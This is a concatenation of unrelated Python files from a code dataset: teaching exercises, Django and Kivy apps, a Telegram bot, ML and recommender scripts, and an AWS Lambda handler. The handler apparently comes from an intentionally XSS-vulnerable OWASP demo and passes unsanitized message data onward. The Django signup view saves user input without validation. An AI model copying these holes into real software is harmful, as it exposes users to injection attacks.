\n\nfrom Graphics import*\nfrom math import*\n\ndef calcularDivisores17():\n divisibles=0\n for x in range(1000,10000):\n if x%17==0:\n divisibles+=1\n print(divisibles)\n \n\ndef calcularPi():\n suma=0\n signo=1\n a=int(input(\"Limit\"))\n for k in range(1,a,2):\n fraccion=signo/k\n signo*=-1\n suma+=fraccion\n suma=4*suma\n print(\"PI=\",suma)\n\ndef dibujarCirculosYCuadros():\n v=Window(\"Drawings\",400,400)\n for x in range(1,200,10):\n a=Rectangle((200-x,200-x),(200+x,200+x))\n a.fill=None\n a.draw(v) \n for x in range(1,200,10):\n a=Circle((200,200),x)\n a.fill=None\n a.draw(v) \n\ndef dibujarEstrella():\n v=Window(\"Star\",400,400)\n tortuga=Arrow((100,250),0)\n tortuga.penDown()\n for x in range(5):\n tortuga.forward(200)\n tortuga.rotate(144)\n tortuga.draw(v)\n \ndef dibujarEspiral():\n v=Window(\"Spiral\",400,400)\n tortuga=Arrow((200,200),0)\n tortuga.penDown()\n for x in range (7,400,5):\n tortuga.forward(x)\n tortuga.rotate(90)\n tortuga.draw(v)\n \ndef dibujarCirculos():\n v=Window(\"Circles\",400,400)\n a=(pi/6)\n \n for x in range(12):\n c=Circle((200+50*cos(a),200+50*sin(a)),50)\n c.fill=None\n c.draw(v)\n a+=(pi/6)\n \ndef imprimirOperaciones():\n y=1\n t=1\n for z in range (1,10):\n print(\"%i*8+%i=%i\" %(y,z,(y*8+z)))\n y+=(10**z)+t\n t=(10**z)+t\n t=1\n for z in range(1,10):\n print(\"%i*%i=%i\"%(t,t,t**2))\n t=(10**z)+t\n\n \ndef main():\n f=int(input(\"1.Circles and squares\\n2.Star\\n3.Square spiral\\n4.Circles\\n5.Compute pi\\n6.Four-digit numbers divisible by 17\\n7.Operations\\n8.Exit\"))\n while f!=8:\n if f==1:\n dibujarCirculosYCuadros()\n if f==2:\n dibujarEstrella()\n if f==3:\n dibujarEspiral()\n if f==4:\n dibujarCirculos()\n if f==5:\n calcularPi()\n if f==6:\n calcularDivisores17()\n if f==7:\n imprimirOperaciones()\n f=int(input(\"1.Circles and squares\\n2.Star\\n3.Square spiral\\n4.Circles\\n5.Compute pi\\n6.Four-digit numbers divisible by 17\\n7.Operations\\n8.Exit\"))\n \nmain()","sub_path":"cicloFor.py","file_name":"cicloFor.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"30648506","text":"from django.shortcuts import render\nfrom jobsapp.models import Hydjobs\nfrom jobsapp.models import Punejobs\nfrom jobsapp.models import Chennaijobs\nfrom jobsapp.models import Banglorejobs\nfrom jobsapp import forms\nfrom jobsapp .models import Student\nfrom django.contrib.auth.decorators import login_required\nfrom jobsapp.forms import SignUpForm\nfrom django.http import HttpResponseRedirect\n# Create your views here.\ndef thankyou_view(request):\n return render(request,'thank.html')\n\ndef index(request):\n\treturn render(request,'index.html')\n@login_required\ndef hydjobs(request):\n\thyd_list=Hydjobs.objects.all()\n\tmy_dict={'hyd_list':hyd_list}\n\treturn render(request,'hydjobs.html',context=my_dict)\n@login_required\ndef punejobs(request):\n\tpune_list=Punejobs.objects.all()\n\tmy_dict={'pune_list':pune_list}\n\treturn render(request,'pune.html',context=my_dict)\ndef signup_view(request):\n\tform=SignUpForm()\n\tif request.method=='POST':\n\t\tform=SignUpForm(request.POST)\n\t\tuser=form.save()\n\t\tuser.set_password(user.password)\n\t\tuser.save()\n\t\treturn HttpResponseRedirect('/accounts/login')\n\treturn render(request,'signup.html',{'form':form})\n\n\n\n\n@login_required\ndef chennaijobs(request):\n\tchennai_list=Chennaijobs.objects.all()\n\tmy_dict={'chennai_list':chennai_list}\n\treturn 
render(request,'chennai.html',context=my_dict)\n\n@login_required\ndef banglorejobs(request):\n\tbanglore_list=Banglorejobs.objects.all()\n\tmy_dict={'banglore_list':banglore_list}\n\treturn render(request,'banglore.html',context=my_dict)\n\n\n\n@login_required\ndef student_view(request):\n\tform=forms.StudentForm()\n\tif request.method=='POST':\n\t\tform=forms.StudentForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save(commit=True)\n\t\t\treturn thankyou_view(request)\n\t\n\treturn render(request ,'form.html',{'form':form})\n\n\n@login_required\ndef list_student(request):\n\tstudent_list=Student.objects.all()\n\treturn render(request,'student.html',{'student_list':student_list})\n","sub_path":"jobsinformation/jobsapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"401548229","text":"# definitions of a few constants\npi= 3.14159\ne= 2.71\ns= 1 #error 1\n\n\n# a little work on a string\n\nch= \"python\"\nch1=\"est une\"\nd= ch[5] + ch[4] + ch[3] + ch[2] + ch[1] + ch[0]\ne= ch[2:] + ch[0:2] #error 2\nf= ch[-1] #error 3\ng=ch1[:5]\nx=\"informatique\" #error 4\nprint(ch+ g +\"langage\"+x, \"formidable\") #error 5\n\n\n# computing a few terms of a sequence\n\nx0= -2 \nx1= 4*x0 + 3 #error 6\nx2= 4*x1 + 3\nx3= 4*x2 + 3\nx4= 4*x3 + 3\nx5= 4*x4 + 3\nprint (\"finally we get x5\")\n\n\n# another sequence \nn=0\nx=3 #error 7\nx=2+x/3\nn+=1\nx=2+x/3\nn+=1\nx=2+x/3\nn+=1\nx=2+x/3\nn+=1\nx=2+x/3\nprint(x) #error 8\n\n#dialogue\nn=input (\"what is your username? 
\")\nprint (\"bonjour\",n) #erreur 9\na= input (\"votre annee de naissance ?\")\nprint ( \" ah vous avez \", 2016 - int(a), \"ans\") #erreur 10\n\"au revoir\"\n\n","sub_path":"L1/Semestre 2/TP INFO/TP1/erreur.py","file_name":"erreur.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"612394893","text":"import sys\nimport gym\n#import envs.arisim\n\nfrom baselines import deepq\nfrom gym.envs.registration import register\n\nregister(\n id='AirSimCarEnv-v22',\n entry_point='envs.airsim.airsimcarenv:AirSimCarEnv',\n max_episode_steps=200000,\n reward_threshold=25.0,\n)\n\n\n\ndef callback(lcl, glb):\n # stop training if reward exceeds 199999\n is_solved = lcl['t'] > 100 and sum(lcl['episode_rewards'][-101:-1]) / 100 >= 199999\n return is_solved\n\ndef main():\n env = gym.make(\"AirSimCarEnv-v22\")\n \n print(\"\\n======= Act session starts for DQN Car =======\") \n trainedModel = \"car.pkl\"\n \n act = load_act(trainedModel)\n\n\nif __name__ == '__main__':\n main()\n ","sub_path":"DRL/runcar.py","file_name":"runcar.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"363508788","text":"import pickle\n#loading a model from a file called model.pkl\nmodel = pickle.load(open(\"model.pkl\",\"rb\"))\n\ndataset = pickle.load(open(\"dataset.pkl\",\"rb\"))\n\n\n#aceste 2 functii vor fi utile pentru frontend --------------------------------\ndef getMakes():\n #returneaza o lista cu marcile masinilor din model pentru frontend\n makes = []\n \n for index,row in dataset.iterrows():\n if row['Make'] not in makes:\n makes.append(row['Make'])\n \n return makes\n\n\ndef getModels(make):\n #make e un string, adica e un element \n #din lista furnizata de functia de mai sus\n\n models = []\n \n for index,row in dataset.iterrows():\n if(row['Make'] == make and row['Model'] not in models):\n models.append(row['Model'])\n \n return models\n\nprint(getModels('Audi'))\n#------------------------------------------------------------------------------\n\n\nX = pickle.load(open(\"X.pkl\",\"rb\"))\n#functie pentru endpoint-ul in care vom face prezicerea primind ca parametrii\n#marca, modelul(furnizate de functiile de mai sus), anul si km\n\ndef estimatePrice(make,carmodel,year,mileage):\n \n index_X = 0\n \n for index,row in dataset.iterrows():\n if(row['Make'] == make and row['Model'] == carmodel):\n index_X = index\n \n variable = X[index_X]\n variable[-1] = mileage\n variable[-2] = year\n variable2 = []\n variable2.append(variable)\n variable2.append(variable)\n return model.predict(variable2)\n\n#functia asta va rezulta o lista cu 2 elemente, ambele sunt identice\n#motivul este ca pentru metoda predict a modelului aveam nevoie de o matrice\n#iar, eu am creat o matrice cu 2 linii care reprezinta de 2 ori datele despre masina\n\n\nprint(estimatePrice('Audi','A3Sedan',2015,25000))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"ML/deserializingModelTest.py","file_name":"deserializingModelTest.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"587756077","text":"import random\n\n\nclass Randomize:\n def __init__(self, level):\n \"\"\"\n :param level: level\n \"\"\"\n self.level = level\n\n def random_circle(self):\n \"\"\"\n This method random number of circle. 
Number depends on level which was chosen by user\n :return: number of circle\n \"\"\"\n value = 0\n if self.level == 0:\n value = random.randint(4, 7)\n if self.level == 1:\n value = random.randint(8, 10)\n if self.level == 2:\n value = random.randint(11, 13)\n return value\n","sub_path":"Hashi/randomize.py","file_name":"randomize.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"414951536","text":"from typing import Any, Dict\n\nfrom kivy import utils\nfrom kivy.graphics.context_instructions import Color\nfrom kivy.graphics.vertex_instructions import Rectangle\nfrom kivy.properties import StringProperty, ObjectProperty\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.relativelayout import RelativeLayout\nfrom kivy.uix.widget import Widget\n\nfrom graph import Graph, make_acyclic, calculate_rank, add_virtual_nodes, ordering, xcoordinate, ycoordinate\n\n\nclass Person(BoxLayout):\n name = StringProperty('Ivan Ivanov')\n sex = StringProperty('M')\n birthday = ObjectProperty(None)\n\n def __init__(self, ident: str, data, **kwargs):\n self._ident = ident\n super(Person, self).__init__(**kwargs)\n self.name = data.get('NAME', None)\n self.sex = data.get('SEX', None)\n self._famc = None\n self._fams = None\n\n def add_family_links(self, data, families: Dict[str, 'Family']):\n self._famc = families.get(data.get('FAMC', None), None)\n self._fams = families.get(data.get('FAMS', None), None)\n\n def __iter__(self):\n # if self._famc is not None:\n # yield self._famc\n if self._fams is not None:\n yield self._fams\n\n def __repr__(self):\n return f'<{self._ident}>'\n\n\nclass Family(BoxLayout):\n def __init__(self, ident: str, data: Dict[str, Any], persons: Dict[str, Person], **kwargs):\n self._ident = ident\n super(Family, self).__init__(**kwargs)\n self._husband = persons.get(data.get('HUSB', None), None)\n self._wife = persons.get(data.get('WIFE', None), None)\n children = data.get('CHIL', None)\n if children is not None:\n if type(children) is list:\n self._children_person = [persons.get(child, None) for child in children]\n else:\n self._children_person = [persons.get(children, None)]\n\n def __iter__(self):\n # if self._husband is not None:\n # yield self._husband\n # if self._wife is not None:\n # yield self._wife\n for child in self._children_person:\n yield child\n\n def __repr__(self):\n return f'<{self._ident}>'\n\n\nclass FamilyTreeGraph(RelativeLayout):\n\n def __init__(self, **kwargs):\n super(FamilyTreeGraph, self).__init__(**kwargs)\n self.persons = dict()\n self.families = dict()\n\n def parse_dict(self, data):\n print(data)\n self.persons = {key: Person(key, person) for key, person in data['INDI'].items()}\n self.families = {key: Family(key, fam, self.persons) for key, fam in data['FAM'].items()}\n for key, person in data['INDI'].items():\n self.persons[key].add_family_links(person, self.families)\n for i, (indi, person) in enumerate(self.persons.items()):\n self.add_widget(person)\n\n for i, (indi, fam) in enumerate(self.families.items()):\n self.add_widget(fam)\n self._loaded = True\n\n def test(self):\n if not getattr(self, '_loaded', False):\n return\n nodes = list(self.persons.values()) + list(self.families.values())\n edges = []\n for v in nodes:\n for u in v:\n edges.append((v, u))\n fg = Graph(edges, nodes)\n print(fg)\n make_acyclic(fg)\n ranks = calculate_rank(fg)\n virtual_nodes = 
add_virtual_nodes(fg, ranks)\n order = ordering(fg, ranks)\n xcoord = xcoordinate(fg, ranks, order)\n print(f'xcoord={xcoord}')\n ycoord = ycoordinate(fg, ranks, order)\n print(f'ycoord={ycoord}')\n\n for i, (indi, person) in enumerate(self.persons.items()):\n print(f'{indi} : {person}: {person.size}')\n person.pos = (xcoord[person], self.size[1] - ycoord[person] - person.size[1])\n for i, (indi, fam) in enumerate(self.families.items()):\n print(f'{indi} : {fam}: {fam.size}')\n fam.pos = (xcoord[fam], self.size[1] - ycoord[fam] - fam.size[1])\n\n def do_layout(self, *args):\n super(RelativeLayout, self).do_layout(*args)\n self.test()\n","sub_path":"genealogy.py","file_name":"genealogy.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"221038263","text":"#The area of a rectangle = length * width\n#ask for length and width of two rectangles\n#identify which one has the greater area or if they are the same\n\nlength1 = float(input(\"Enter length of Rectangle 1:\"))\nwidth1 = float(input(\"Enter width of Rectangle 1:\"))\nlength2 = float(input(\"Enter length of Rectangle 2:\"))\nwidth2 = float(input(\"Enter width of Rectangle 2:\"))\n\narea1 = length1 * width1\narea2 = length2 * width2\n\nif area1 > area2:\n print(\"Rectangle 1 has a greater area than Rectangle 2.\")\nelif area2 > area1:\n print(\"Rectangle 2 has a greater area than Rectangle 1.\")\nelse: \n print(\"The areas of Rectangle 1 and Rectangle 2 are the same.\")\n\n","sub_path":"intro_to_prog/Recitation03.py","file_name":"Recitation03.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"241858615","text":"from sklearn.feature_extraction.text import TfidfVectorizer\n\ndef user_formatting(users):\n \"\"\"\n :param users: users from json file\n :return: list of formatted users\n\n :example:\n\n users = [\n {\n 'id':13,\n 'first_name':\"Guillaume\",\n 'last_namer':\"Sturtzer\",\n 'age':20,\n 'job':\"Intern\",\n 'groups':[\"group1\", \"group2\"],\n 'coworkers':[\"coworker1\", \"coworker2\"],\n 'projects':[\"project1\", \"project2\"],\n 'use_articles':{\n 'project1':[],\n 'project2':['article1','article2']\n }\n }\n ]\n\n Return : [\"Intern group_group1 group_group2 coworker_coworker1 coworker_coworker2 project_project1 project_project2\"]\n \"\"\"\n const = {\n 'projects':'project_',\n 'groups':'group_',\n 'coworkers':'coworker_'\n }\n\n formatted_users = []\n for idx in users:\n user = users[idx]\n tmp_str = user['job']+\" \"\n for name in const:\n prefix = const[name]\n for x in user[name]:\n tmp_str += prefix+x+\" \"\n formatted_users.append(tmp_str)\n\n return formatted_users\n\ndef user_sparse_matrix(users):\n \"\"\"\n :param users: users from json file\n :return: sparse matrix for users\n \"\"\"\n TFIDF_vectorizer = TfidfVectorizer()\n\n users = user_formatting(users)\n return TFIDF_vectorizer.fit_transform(users)\n\n\ndef recommanded_articles_of_project(user, id_project, similar_users, all_users, all_articles, top_n=None):\n \"\"\"\n :param user: user data\n :param id_project: id of the project\n :param similar_users: most similar users\n :param all_users: all users data\n :param all_articles: all articles data\n :param top_n: number of the most similar elements returned. 
If None, all elements are returned\n :return: top_n tuples (article, user similarity)\n \"\"\"\n if id_project in user['use_articles']:\n articles_already_used = user['use_articles'][id_project]\n else:\n articles_already_used = []\n \n articles = []\n for user in similar_users:\n if id_project in all_users[str(user['id'])]['use_articles']:\n other_articles = all_users[str(user['id'])]['use_articles'][id_project]\n \n for article in [article for article in other_articles if article not in articles_already_used]:\n articles.append((article, user['similarity']))\n articles_already_used.append(article)\n if top_n is not None and top_n <= len(articles):\n return articles\n\n return articles\n\n\nif __name__ == '__main__':\n from sklearn.feature_extraction.text import TfidfVectorizer\n import sys\n from os.path import join, dirname\n sys.path.append(join(dirname(__file__), \"..\", \"..\"))\n from static.python.utils import load_json_file\n from static.python.utils import print_sparse_matrix\n from static.python.cosineSimilarity import create_cosine_similiarity_matrix, find_most_similar, find_n_most_similar\n\n articles_filename = 'static/articles.json'\n users_filename = 'static/users.json' \n\n users = load_json_file(users_filename)\n articles = load_json_file(articles_filename)\n link_id_cosine_to_user = {}\n id_project = \"project1\"\n\n i = 0\n for id_user in users:\n link_id_cosine_to_user[i] = id_user\n i += 1\n\n id_user = 0\n sparse_matrix = user_sparse_matrix(users)\n print_sparse_matrix(sparse_matrix)\n\n cosine_matrix = create_cosine_similiarity_matrix(sparse_matrix)\n similar_users = find_n_most_similar(cosine_matrix, id_user)\n\n for user in similar_users:\n user['id'] = link_id_cosine_to_user[user['id']]\n\n similar_articles = recommanded_articles_of_project(users[link_id_cosine_to_user[id_user]], id_project, similar_users, users, articles)\n print(similar_articles)\n # print(find_most_similar(cosine_matrix,0))\n # similar_users = find_n_most_similar(cosine_matrix,0,None)\n # print(similar_users)\n # user_solutions = users[str(0)]['use_articles']\n\n \n # order_articles_to_use = []\n # for user in similar_users:\n # other_articles = users[str(user['id'])]['use_articles']\n # for article in [article for article in other_articles if article not in order_articles_to_use and article not in user_solutions]:\n # order_articles_to_use.append(article)\n\n # print(order_articles_to_use)","sub_path":"static/python/userBased.py","file_name":"userBased.py","file_ext":"py","file_size_in_byte":4574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"29384103","text":"# Create your views here.\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.shortcuts import render_to_response\nfrom django.template import Context, loader, RequestContext\nfrom django.contrib.auth import logout, authenticate, login\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.template.loader import get_template\nfrom learning_outcomes.models import *\nfrom learning_outcomes.forms import ContactForm\ndef home(request):\n\n\tvariables = Context({\n\t\t'head_title':'Learning Outcomes',\n\t\t'page_title':'Main Page',\n\t\t'page_body': 'Welcome',\n\t\t})\n\t\n\treturn render_to_response('base.html', variables)\n@login_required\ndef profile(request):\n\tuser = request.user\n\tfirst_name = request.user.first_name\n\tuser_email = request.user.email\n\tchildrens = 
Childrens.objects.filter(parent = user)\n\tvariables = Context({ 'user': user, \n\t\t\t\t\t\t 'user_email': user_email,\n\t\t\t\t\t\t 'user_first_name': first_name,\n\t\t\t\t\t\t 'childrens': childrens})\n\treturn render_to_response('profile.html', variables)\n\n@login_required\ndef student_page(request,child_name):\n\tuser = request.user\n\tuser_email = request.user.email\n\t\n\tchild_object = Childrens.objects.get(parent = user, child = child_name)\n\ttotal_classes =[]\n\ttotal_classes_int =[]\n\tfor in_year in child_object.year.all():\n\t\ttotal_classes.append(in_year)\n\tfor i in range(len(total_classes)):\n\t\ttotal_classes_int.append(int(str(total_classes[i])))\n\n\n\tpresent_class =max(total_classes_int)\n\tpdfs = PdfTemp.objects.filter(email=user_email, student_name = child_name)\n\tschool = child_object.school.all()\n\ttest = child_object.test.all()\n\tyear = child_object.year.all()\n\tsubject = child_object.subject.all()\n\t# Bucket each pdf by class year and semester instead of hand-writing 36 nearly identical branches.\n\tordinals = {1: '1st', 2: '2nd', 3: '3rd'}\n\tyear_keys = dict((str(n), ordinals.get(n, '%dth' % n)) for n in range(1, 13))\n\tclass_semester = dict((key, {'Semester1': [], 'Semester2': [], 'Semester3': []}) for key in year_keys.values())\n\tfor students in pdfs:\n\t\tyear_key = year_keys.get(students.year)\n\t\tif year_key and students.test in class_semester[year_key]:\n\t\t\tclass_semester[year_key][students.test].append(students)\n\n\tcontext_data = {\n\t\t'school': school,\n\t\t'test': test,\n\t\t'year': year,\n\t\t'subject': subject,\n\t\t'child_name': child_name,\n\t\t'pdfs': pdfs,\n\t\t'present_class': present_class,\n\t}\n\t# Expose the same 'classN_semesterM' keys the student.html template already expects.\n\tfor n in range(1, 13):\n\t\tfor m in (1, 2, 3):\n\t\t\tcontext_data['class%d_semester%d' % (n, m)] = class_semester[year_keys[str(n)]]['Semester%d' % m]\n\tvariables = Context(context_data)\n\treturn render_to_response('student.html', variables)\n\n\ndef Contact(request):\n\t# local import keeps this fix self-contained in this view\n\tfrom django.core.mail import send_mail\n\tif request.method == \"POST\":\n\t\tform = ContactForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tcd = form.cleaned_data\n\t\t\tsend_mail(\n\t\t\t\tcd['subject'],\n\t\t\t\tcd['message'],\n\t\t\t\tcd.get('email', 'noreply@example.com'),\n\t\t\t\t['siteowner@example.com'])\n\t\t\treturn HttpResponseRedirect('/contact/success')\n\telse:\n\t\tform = 
ContactForm(\n\t\t\tinitial={'subject':\"i love your site\"})\n\n\treturn render_to_response(\"contact.html\",{'form':form})","sub_path":"learning_outcomes/views_temp.py","file_name":"views_temp.py","file_ext":"py","file_size_in_byte":10707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"346227945","text":"'''\n443. String Compression\n\nDifficulty: Easy\nGiven an array of characters, compress it in-place.\nThe length after compression must always be smaller than or equal to the original array.\nEvery element of the array should be a character (not int) of length 1.\nAfter you are done modifying the input array in-place, return the new length of the array.\n\nFollow up:\nCould you solve it using only O(1) extra space?\n\nExample 1:\nInput:\n[\"a\",\"a\",\"b\",\"b\",\"c\",\"c\",\"c\"]\n\nOutput:\nReturn 6, and the first 6 characters of the input array should be: [\"a\",\"2\",\"b\",\"2\",\"c\",\"3\"]\n\nExplanation:\n\"aa\" is replaced by \"a2\". \"bb\" is replaced by \"b2\". \"ccc\" is replaced by \"c3\".\nExample 2:\nInput:\n[\"a\"]\n\nOutput:\nReturn 1, and the first 1 characters of the input array should be: [\"a\"]\n\nExplanation:\nNothing is replaced.\nExample 3:\nInput:\n[\"a\",\"b\",\"b\",\"b\",\"b\",\"b\",\"b\",\"b\",\"b\",\"b\",\"b\",\"b\",\"b\"]\n\nOutput:\nReturn 4, and the first 4 characters of the input array should be: [\"a\",\"b\",\"1\",\"2\"].\n\nExplanation:\nSince the character \"a\" does not repeat, it is not compressed. \"bbbbbbbbbbbb\" is replaced by \"b12\".\nNotice each digit has its own entry in the array.\n'''\nclass Solution(object):\n    def compress(self, chars):\n        \"\"\"\n        :type chars: List[str]\n        :rtype: int\n        \"\"\"\n        if not chars:\n            return 0\n        curC = chars[0]\n        curCount = 1\n        ans = []\n        for i in range(1, len(chars)):\n            if chars[i] != curC:\n                ans.append(curC)\n                if curCount != 1:\n                    ans.extend(list(str(curCount)))\n                curC = chars[i]\n                curCount = 1\n            else:\n                curCount += 1\n        ans.append(curC)\n        if curCount != 1:\n            ans.extend(list(str(curCount)))\n        for i in range(len(ans)):\n            chars[i] = ans[i]\n\n        return len(ans)\nsol = Solution()\nprint(sol.compress([\"a\",\"a\",\"b\",\"b\",\"c\",\"c\",\"c\"]))\n\n\n\n\n\n\n","sub_path":"LeetCodeContests/56/string_compression.py","file_name":"string_compression.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"136113069","text":"# TOKEN = demjson.decode(open('../files/constants.json','r').read())['TOKEN']\n\nfrom colors import colors\nimport sys\nimport asyncio\nimport subprocess\nimport telepot\nimport demjson\nimport time\nimport codecs\nfrom random import randint\nfrom telepot import message_identifier, glance\nfrom telepot.aio.loop import MessageLoop\nfrom telepot.aio.delegate import pave_event_space, per_chat_id, create_open\nfrom telepot.namedtuple import InlineKeyboardMarkup, InlineKeyboardButton\n\napp_constants = demjson.decode(open('../files/constants.json', 'r').read())\ncurrent_hafez_faal = {}\n\n\ndef is_admin(user_id):\n    admins = app_constants['ADMIN IDS']\n    for admin in admins:\n        if(user_id == admin):\n            print('>> ADMIN PERMISSION <<')\n            return True\n    # report failure only after every admin id has been checked\n    return False\n\n\nasync def on_chat_message(msg):\n    # defaults\n    print(colors.HEADER + '@' + msg['from']['username'] + ': ' + colors.OKBLUE + '\\\"' + msg['text'] + '\\\"' +\n          colors.WARNING + ' (' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(msg['date'])) + ')' + 
colors.ENDC)\n    log_file = codecs.open('../files/logs.txt', 'a', 'utf-8')\n    log_file.write('@' + msg['from']['username'] + ' \\\"' + msg['text'] + '\\\"' +\n                   ' (' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(msg['date'])) + ')\\n')\n    log_file.close()\n    hafez_faal_received = False\n    # 📗 فال حافظ\n    if(msg['text'] == '📗 فال حافظ'):\n        current_hafez_faal[msg['chat']['id']] = randint(1, 495)\n        await bot.sendMessage(msg['chat']['id'], 'علاقه مند هستین که فال خود را به چه صورتی دریافت کنید ؟', reply_markup={'keyboard': [['📷 دریافت عکس از فال'], ['🗣 دریافت فایل صوتی'], ['✒ دریافت متن فال'], ['➡ بازگشت به منو اصلی']], 'selective': True})\n    # 📷 دریافت عکس از فال\n    elif(msg['text'] == '📷 دریافت عکس از فال'):\n        await bot.sendPhoto(msg['chat']['id'], open('../files/hafez/images/' + str(current_hafez_faal[msg['chat']['id']]) + '.png', 'rb'), reply_markup=InlineKeyboardMarkup(inline_keyboard=[[\n            InlineKeyboardButton(text='دریافت تعبیر فال 🔮', callback_data='yes'),\n        ]]))\n    # 🗣 دریافت فایل صوتی\n    elif(msg['text'] == '🗣 دریافت فایل صوتی'):\n        await bot.sendVoice(msg['chat']['id'], open('../files/hafez/voices/' + str(current_hafez_faal[msg['chat']['id']]) + '.ogg', 'rb'), reply_markup=InlineKeyboardMarkup(inline_keyboard=[[\n            InlineKeyboardButton(text='دریافت تعبیر فال 🔮', callback_data='yes'),\n        ]]))\n    # ✒ دریافت متن فال\n    elif(msg['text'] == '✒ دریافت متن فال'):\n        vars = codecs.open('../files/hafez/texts/' + str(\n            current_hafez_faal[msg['chat']['id']]) + '.txt', 'r', \"utf-8\").readlines()\n        # vars = codecs.open('../files/hafez/texts/2.txt','r',\"utf-8\").readlines()\n        result = ''\n        for var in vars:\n            result += var.replace('\\\\n\\\\t', '\\n') + '\\n'\n        # await bot.sendMessage(msg['chat']['id'],result,reply_markup= {'keyboard': [['📷 دریافت عکس از فال','🗣 دریافت فایل صوتی'],['🔮 دریافت تعبیر فال','✒ دریافت متن فال'],['➡ بازگشت به منو اصلی']], 'selective': True})\n        await bot.sendMessage(msg['chat']['id'], result, reply_markup=InlineKeyboardMarkup(inline_keyboard=[[\n            InlineKeyboardButton(text='دریافت تعبیر فال 🔮', callback_data='yes'),\n        ]]))\n    # on admin commands\n    elif(msg['text'] == 'ipconfig'):\n        if(is_admin(msg['chat']['id'])):\n            ip_details = str(subprocess.check_output(\"ipconfig\")).strip('\\n')\n            ip_details = ip_details.strip('\\r')\n            await bot.sendMessage(msg['chat']['id'],ip_details) \n    # on any message\n    else:\n        hafez_faal_received = False\n        await bot.sendMessage(msg['chat']['id'], 'گزینه ی دلخواه خود را انتخاب کنید ', reply_markup={'keyboard': [['📗 فال حافظ']], 'selective': True})\n\n\nasync def on_callback_query(msg):\n    query_id, from_id, query_data = glance(msg, flavor='callback_query')\n    if query_data == 'yes':\n        result = codecs.open('../files/hafez/interpretations/' + str(\n            current_hafez_faal[from_id]) + '.txt', 'r', \"utf-8\").readlines()\n        await bot.sendMessage(from_id,str(result[0]))\n    \n\nbot = telepot.aio.Bot(app_constants['TOKEN'])\nloop = asyncio.get_event_loop()\nloop.create_task(MessageLoop(\n    bot, {'chat': on_chat_message, 'callback_query': on_callback_query}).run_forever())\nprint(colors.OKGREEN + 'Bot starts running ...' 
+ colors.ENDC)\nloop.run_forever()\n","sub_path":"src/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"650285793","text":"import boto3, json\n\ndef lambda_handler(event, context):\n    msg_id = event['Records'][0]['Sns']['MessageId']\n    msg_data = event['Records'][0]['Sns']['Message']\n\n    client = boto3.client('iot-data', region_name='us-east-1')\n    link = \"Click\"\n    response = client.publish(\n        topic='protego-a7-topic',\n        qos=1,\n        payload=json.dumps({\"msg\": msg_data, \"id\": link})\n    )\n","sub_path":"python-serverless-owasp-api_xss/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"254539069","text":"from PyQt4 import QtCore, QtGui\r\nfrom datetime import datetime\r\n\r\nimport module.common as common\r\nimport module.asset as asset\r\nfrom obj.psr_field import WriteElementTypes\r\n\r\nclass PSRRawDataTableView(QtGui.QTableView):\r\n    def __init__(self, parent = None):\r\n        super(PSRRawDataTableView, self).__init__(parent)\r\n\r\n        self.initialize_user_interface()\r\n\r\n        self.initialize_model()\r\n\r\n        self.initialize_signals()\r\n\r\n    def initialize_user_interface(self):\r\n        self.clearDataAction = QtGui.QAction('&Clear New Data', self)\r\n        self.reloadDataAction = QtGui.QAction('Reload Data from Agile', self)\r\n\r\n        self.copyDataAction = QtGui.QAction('Copy', self)\r\n        self.copyDataAction.setShortcut(QtGui.QKeySequence('Ctrl+C'))\r\n        self.copyDataAction.setShortcutContext(QtCore.Qt.WidgetShortcut)\r\n\r\n        self.appendAndEditAction = QtGui.QAction('&Append and Edit', self)\r\n        self.appendAndEditWithSignatureAction = QtGui.QAction('App&end and Edit with Signature', self)\r\n        self.writeNullValueAction = QtGui.QAction('&Write Null Value', self)\r\n\r\n    def initialize_model(self):\r\n        from widget.finale.obj.psr_raw_data_table_view_model import PSRRawDataTableViewModel\r\n\r\n        self.model = PSRRawDataTableViewModel()\r\n        self.setModel(self.model)\r\n\r\n        from widget.finale.obj.psr_raw_data_table_view_edit_delegate import PSRRawDataTableViewEditDelegate\r\n\r\n        self.psr_raw_data_table_view_edit_delegate = PSRRawDataTableViewEditDelegate(self)\r\n        self.setItemDelegate(self.psr_raw_data_table_view_edit_delegate)\r\n\r\n    def initialize_signals(self):\r\n        